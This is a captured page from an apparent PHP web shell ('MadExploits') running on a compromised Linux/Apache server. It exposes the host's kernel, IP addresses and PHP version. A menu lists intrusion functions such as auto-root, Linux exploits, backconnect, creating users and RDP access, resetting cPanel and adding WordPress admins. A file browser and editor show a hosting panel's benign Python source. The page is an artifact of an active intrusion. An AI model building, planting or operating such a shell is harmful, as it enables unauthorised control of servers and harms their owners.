Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.147.8.67
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
class_v2 /
projectModelV2 /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
common
[ DIR ]
drwxr-xr-x
base.py
1.74
KB
-rw-r--r--
dockerModel.py
4.08
KB
-rw-r--r--
nodejsModel.py
95.08
KB
-rw-r--r--
quotaModel.py
45.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : base.py
#coding: utf-8 import public,re class projectBase: def check_port(self, port): ''' @name 检查端口是否被占用 @args port:端口号 @return: 被占用返回True,否则返回False @author: lkq 2021-08-28 ''' a = public.ExecShell("netstat -nltp|awk '{print $4}'") if a[0]: if re.search(':' + port + '\n', a[0]): return True else: return False else: return False def is_domain(self, domain): ''' @name 验证域名合法性 @args domain:域名 @return: 合法返回True,否则返回False @author: lkq 2021-08-28 ''' import re domain_regex = re.compile(r'(?:[A-Z0-9_](?:[A-Z0-9-_]{0,247}[A-Z0-9])?\.)+(?:[A-Z]{2,6}|[A-Z0-9-]{2,}(?<!-))\Z', re.IGNORECASE) return True if domain_regex.match(domain) else False def generate_random_port(self): ''' @name 生成随机端口 @args @return: 端口号 @author: lkq 2021-08-28 ''' import random port = str(random.randint(5000, 10000)) while True: if not self.check_port(port): break port = str(random.randint(5000, 10000)) return port def IsOpen(self, port): ''' @name 检查端口是否被占用 @args port:端口号 @return: 被占用返回True,否则返回False @author: lkq 2021-08-28 ''' ip = '0.0.0.0' import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, int(port))) s.shutdown(2) return True except: return False
Close